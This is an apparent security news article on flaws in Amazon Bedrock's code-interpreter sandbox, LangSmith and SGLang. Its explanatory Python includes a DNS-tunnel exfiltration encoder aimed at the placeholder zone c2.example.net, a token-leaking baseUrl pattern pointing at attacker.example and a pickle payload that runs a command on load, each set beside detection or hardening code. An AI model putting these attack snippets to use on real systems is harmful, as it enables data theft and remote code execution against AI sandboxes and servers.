Bedrock's DNS Flaw Undermines Network Isolation
Security researchers at BeyondTrust have detailed a novel method for exfiltrating sensitive data from AI code execution environments using domain name system (DNS) queries. The report highlights a significant flaw in Amazon Bedrock AgentCore Code Interpreter's sandbox mode, which still permits outbound DNS queries even when it is configured for "no network access." This oversight gives an attacker a pathway around the network isolation controls.

Attackers can exploit this behavior to establish bidirectional command-and-control channels and exfiltrate sensitive information: data leaves in the query names and instructions come back in the responses. This becomes particularly dangerous if the code interpreter's IAM role holds overprivileged permissions to AWS resources such as S3 buckets. In that scenario an interactive reverse shell can be obtained and commands executed stealthily over DNS. The flaw, which lacks a CVE identifier, carries a CVSS score of 7.5 out of 10.0.
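To make the mechanism concrete, the Python below is an added illustration written for this article, not code from BeyondTrust's report or from AWS. It shows how a sandbox that can only resolve names still moves data out: the payload is split into base32 chunks that fit DNS label limits, each chunk becomes a query name under a zone the attacker controls (c2.example.net and the session label s1 are placeholders), and the attacker's authoritative server reassembles the chunks from the queries it sees, in any order and with retries; commands travel the other way in TXT answers. No socket is opened here; the names are only built and parsed, and the leaked string is constructed.

```python
import base64
import re
from typing import Dict, Iterable, List

# Assumptions for this example: the attacker runs the authoritative name server
# for ATTACKER_ZONE, and the sandbox can resolve names even though it cannot
# open connections to arbitrary hosts (the behaviour the report describes).
ATTACKER_ZONE = "c2.example.net"   # placeholder zone, not taken from the report
MAX_LABEL = 63                     # RFC 1035 label limit
MAX_NAME = 253                     # practical limit for a full domain name
CHUNK_BYTES = 30                   # 30 raw bytes -> 48 base32 characters per label


def _b32(data: bytes) -> str:
    # Base32 without padding: alphanumeric and case-insensitive, so it survives
    # resolvers that lowercase or otherwise normalise names (base64 would not).
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * ((-len(text)) % 8))


def encode_queries(payload: bytes, session: str, zone: str = ATTACKER_ZONE) -> List[str]:
    """Uplink: turn a payload into names the sandbox can resolve.

    Each name is <seq>-<base32 chunk>.<session>.<zone>. The sequence number lets
    the receiver reorder and de-duplicate, because resolvers retry queries and
    may forward them out of order.
    """
    names = []
    for seq, start in enumerate(range(0, len(payload), CHUNK_BYTES)):
        label = f"{seq}-{_b32(payload[start:start + CHUNK_BYTES])}"
        name = f"{label}.{session}.{zone}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk does not fit in a DNS name")
        names.append(name)
    return names


_QUERY_RE = re.compile(r"^(\d+)-([a-z2-7]+)\.([a-z0-9]+)\.(.+)$")


def decode_queries(observed: Iterable[str], session: str, zone: str = ATTACKER_ZONE) -> bytes:
    """Receiver side: reassemble the payload from the query names the authoritative
    server (or a capture in front of it) saw, in any order and with duplicates."""
    chunks: Dict[int, bytes] = {}
    for name in observed:
        m = _QUERY_RE.match(name.lower().rstrip("."))
        if m and m.group(3) == session and m.group(4) == zone:
            chunks[int(m.group(1))] = _unb32(m.group(2))   # duplicates are idempotent
    return b"".join(chunks[i] for i in sorted(chunks))


def encode_reply(command: bytes) -> str:
    """Downlink: the operator's server answers a query with a TXT record carrying
    the next command; this is what makes the channel bidirectional."""
    return _b32(command)


def decode_reply(txt: str) -> bytes:
    return _unb32(txt)


if __name__ == "__main__":
    # Constructed stand-in for something the sandbox read with its IAM role.
    leaked = b"role=AgentCoreTask;bucket=customer-data-prod"
    uplink = encode_queries(leaked, "s1")
    for n in uplink:
        print(n)            # the sandbox would call socket.getaddrinfo(n, None)
    print(decode_queries(uplink[::-1] + uplink[:1], "s1") == leaked)
    print(decode_reply(encode_reply(b"ls /tmp")))
```

The point for defenders is that every byte crosses the boundary inside ordinary recursive lookups, so a control that blocks "network access" but leaves the resolver reachable has blocked nothing.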
While Amazon acknowledged the report, it determined the behavior to be "intended functionality rather than a defect." AWS now recommends customers use VPC mode instead of sandbox mode for complete network isolation. They also advise implementing a DNS firewall to filter outbound DNS traffic. Jason Soroko, a senior fellow at Sectigo, emphasized that "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls."
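The advice above is about enforcement (VPC mode plus a DNS firewall); the detection side is what a resolver query log would show. The Python below is an added example, not AWS tooling and not part of the report, that scores query-log records in the shape of Route 53 Resolver query logs for the two signatures a DNS tunnel leaves: long, high-entropy leftmost labels, and many distinct names under one parent domain. The log lines are constructed, the field subset is an assumption, and the thresholds are starting points to tune against real traffic.

```python
import base64
import hashlib
import json
import math
from collections import defaultdict
from typing import Dict, List

# Thresholds are assumptions, not measured values; tune them on your own logs.
MIN_TUNNEL_LABEL_LEN = 32    # leftmost label this long is rare outside CDNs and tunnels
MIN_LABEL_ENTROPY = 3.5      # bits per character; base32 of random bytes sits near 4.5
MAX_UNIQUE_NAMES = 20        # distinct names under one parent domain per log window
MIN_SUSPICIOUS = 3           # per-query hits before a domain is flagged on that basis


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname: str) -> str:
    # Simplification: the last two labels. Names under public suffixes such as
    # co.uk need a public-suffix list; that is assumed out of scope here.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def query_reasons(qname: str) -> List[str]:
    """Per-query indicators that the leftmost label carries an encoded payload."""
    leftmost = qname.rstrip(".").split(".")[0]
    reasons = []
    if len(leftmost) >= MIN_TUNNEL_LABEL_LEN:
        reasons.append("long-label")
    if shannon_entropy(leftmost) >= MIN_LABEL_ENTROPY:
        reasons.append("high-entropy")
    return reasons


def analyze(log_lines: List[str]) -> Dict[str, dict]:
    """Aggregate query-log records per parent domain and flag tunnelling patterns."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "suspicious": 0, "sources": set()})
    for line in log_lines:
        rec = json.loads(line)
        qname = rec["query_name"]
        s = stats[parent_domain(qname)]
        s["queries"] += 1
        s["names"].add(qname.lower())
        s["sources"].add(rec.get("srcaddr", "?"))
        # Require both indicators so one long CDN hostname does not trip the rule.
        if len(query_reasons(qname)) == 2:
            s["suspicious"] += 1
    report = {}
    for dom, s in stats.items():
        report[dom] = {
            "queries": s["queries"],
            "unique_names": len(s["names"]),
            "suspicious_queries": s["suspicious"],
            "sources": sorted(s["sources"]),
            "flagged": s["suspicious"] >= MIN_SUSPICIOUS or len(s["names"]) >= MAX_UNIQUE_NAMES,
        }
    return report


def constructed_log() -> List[str]:
    """Constructed records using a subset of Route 53 Resolver query-log field
    names; none of these lines come from a real account."""
    def rec(qname: str, src: str = "10.0.1.23") -> str:
        return json.dumps({"vpc_id": "vpc-0123456789abcdef0", "query_timestamp": "2026-01-15T10:00:00Z",
                           "query_name": qname, "query_type": "A", "rcode": "NOERROR", "srcaddr": src})
    lines = [rec("bedrock-runtime.us-east-1.amazonaws.com"), rec("sts.us-east-1.amazonaws.com"),
             rec("pypi.org"), rec("files.pythonhosted.org")]
    for seq in range(25):   # 25 tunnel chunks; sha256 gives deterministic random-looking data
        chunk = hashlib.sha256(str(seq).encode()).digest()[:30]
        label = f"{seq}-" + base64.b32encode(chunk).decode().rstrip("=").lower()
        lines.append(rec(f"{label}.s1.c2.example.net"))
    return lines


if __name__ == "__main__":
    for dom, r in analyze(constructed_log()).items():
        print(("FLAG " if r["flagged"] else "     ") + dom, r)
```

A flagged parent domain is what you would feed into a DNS Firewall deny list, or use to justify an allowlist-only rule for the interpreter's VPC; the log-side logic is the part AWS's recommendation leaves to the customer.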
LangSmith and SGLang Face Critical Exploits
Beyond the Bedrock revelations, two other prominent AI tools, LangSmith and SGLang, are grappling with their own severe vulnerabilities. Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750), affecting both self-hosted and cloud deployments. This vulnerability, rated 8.5 on the CVSS scale, stems from a lack of validation on the `baseUrl` parameter, allowing for URL parameter injection.
An attacker could exploit this by tricking a user into clicking a specially crafted link. Successful exploitation leads to token theft and account takeover, granting unauthorized access to AI trace history, internal SQL queries, CRM customer records, or proprietary source code. The issue was addressed in LangSmith version 0.12.71, released in December 2025.
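The class of bug is easy to reproduce in a few lines. The Python below is an added example, not LangSmith's code and not a reconstruction of the patched logic: a client builds its request target from a baseUrl taken off the page URL, first trusting it as-is, then with the checks that close the hole. The allowlisted host api.smith.example.com, the default origin and the request helpers are placeholders.

```python
from typing import Optional
from urllib.parse import urlsplit

# Placeholder allowlist: a real deployment lists only the API hosts it operates.
ALLOWED_API_HOSTS = {"api.smith.example.com"}
DEFAULT_BASE_URL = "https://api.smith.example.com"


# --- Vulnerable pattern: the baseUrl query parameter is trusted as-is ---------
def vulnerable_request(base_url_param: str, path: str, token: str) -> dict:
    # A link such as https://app.example.com/?baseUrl=https://attacker.example
    # makes the client send its bearer token to a host the attacker picked.
    return {"url": f"{base_url_param.rstrip('/')}{path}",
            "headers": {"Authorization": f"Bearer {token}"}}


# --- Hardened pattern: parse, allowlist the host, rebuild the origin ----------
def safe_base_url(candidate: str) -> Optional[str]:
    """Return a canonical https origin if candidate names an allowlisted host, else None."""
    try:
        p = urlsplit(candidate.strip())
        port = p.port                       # raises ValueError on a non-numeric port
    except ValueError:                      # also covers malformed IPv6 literals
        return None
    if p.scheme != "https":                 # rejects http:, javascript:, and //host
        return None
    if p.username is not None or p.password is not None:
        return None                         # https://api.smith.example.com@attacker.example
    host = p.hostname                       # lowercased, userinfo and port stripped
    if host not in ALLOWED_API_HOSTS:       # exact match: no suffix or prefix tricks
        return None
    if port not in (None, 443) or p.path not in ("", "/") or p.query or p.fragment:
        return None
    return f"https://{host}"                # rebuilt from validated parts; input is never echoed


def hardened_request(base_url_param: str, path: str, token: str) -> dict:
    base = safe_base_url(base_url_param) or DEFAULT_BASE_URL
    return {"url": f"{base}{path}", "headers": {"Authorization": f"Bearer {token}"}}


if __name__ == "__main__":
    crafted = "https://attacker.example"
    print(vulnerable_request(crafted, "/api/v1/runs", "secret")["url"])   # token goes to the attacker
    print(hardened_request(crafted, "/api/v1/runs", "secret")["url"])     # falls back to the real API
```

The decisive detail is the last line of safe_base_url: the origin is rebuilt from the parsed host rather than returned from the input, so whatever the parser tolerated in userinfo, path or encoding never reaches the request.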
Meanwhile, security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models. Discovered by Orca Security researcher Igor Stepansky, these flaws remain unpatched. They involve unsafe pickle deserialization, which can lead to remote code execution (RCE). The most critical vulnerabilities (CVE-2026-3059 and CVE-2026-3060) carry a CVSS score of 9.8, allowing unauthenticated RCE through the ZeroMQ (ZMQ) broker if multimodal generation or disaggregation features are exposed to the network.
A third flaw (CVE-2026-3989), rated 7.8, involves insecure deserialization in a crash dump replay utility. The CERT Coordination Center (CERT/CC) advises SGLang users to restrict access to service interfaces and implement network segmentation and access controls. This prevents unauthorized interaction with ZeroMQ endpoints and protects against potential compromises.
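Why pickle arriving over a network socket is a remote code execution primitive, and what a hardened receiver looks like, as an added Python example that is not SGLang's code and does not reproduce the reported exploit: a pickle whose __reduce__ names subprocess.check_output runs a harmless echo the moment a trusting receiver loads it, while an Unpickler that allowlists find_class refuses the same bytes. The payload stands in for what would arrive on an exposed ZeroMQ endpoint; no socket is opened. Restricting find_class is a mitigation with known limits, not a substitute for a non-executable format such as JSON for messages from untrusted peers.

```python
import io
import pickle
import subprocess
from typing import Any


# --- Attacker side: a pickle that runs a command when loaded ------------------
class Exploit:
    """pickle rebuilds an object by calling whatever __reduce__ names with the
    arguments it supplies. A benign echo stands in for the attacker's command."""

    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))


def build_malicious_payload() -> bytes:
    # These bytes are what would be delivered to the broker's socket.
    return pickle.dumps(Exploit())


# --- Vulnerable receiver: trusts whatever the wire delivers -------------------
def unsafe_loads(data: bytes) -> Any:
    return pickle.loads(data)       # runs subprocess.check_output(["echo", "pwned"])


# --- Hardened receiver: allowlist the globals a message may reference ---------
ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "str"), ("builtins", "int"), ("builtins", "float"), ("builtins", "bytes"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # Every GLOBAL / STACK_GLOBAL opcode passes through here; anything not on
        # the allowlist (subprocess.check_output, os.system, ...) is refused.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True if the hardened receiver refuses the payload."""
    try:
        safe_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


def serialize_message(msg: dict) -> bytes:
    # A legitimate control message: plain containers and scalars only, which
    # pickle encodes without any GLOBAL opcode, so the allowlist never fires.
    return pickle.dumps(msg)


if __name__ == "__main__":
    payload = build_malicious_payload()
    print(unsafe_loads(payload))        # b'pwned\n': the command ran during loading
    print(rejects(payload))             # True: refused before any callable is resolved
    print(safe_loads(serialize_message({"req_id": 1, "prompt": "hi"})))
```

The CERT/CC guidance to keep the ZeroMQ endpoints off untrusted networks follows directly from the first half of this block: once a peer can write to that socket, the only thing standing between them and check_output is the deserializer.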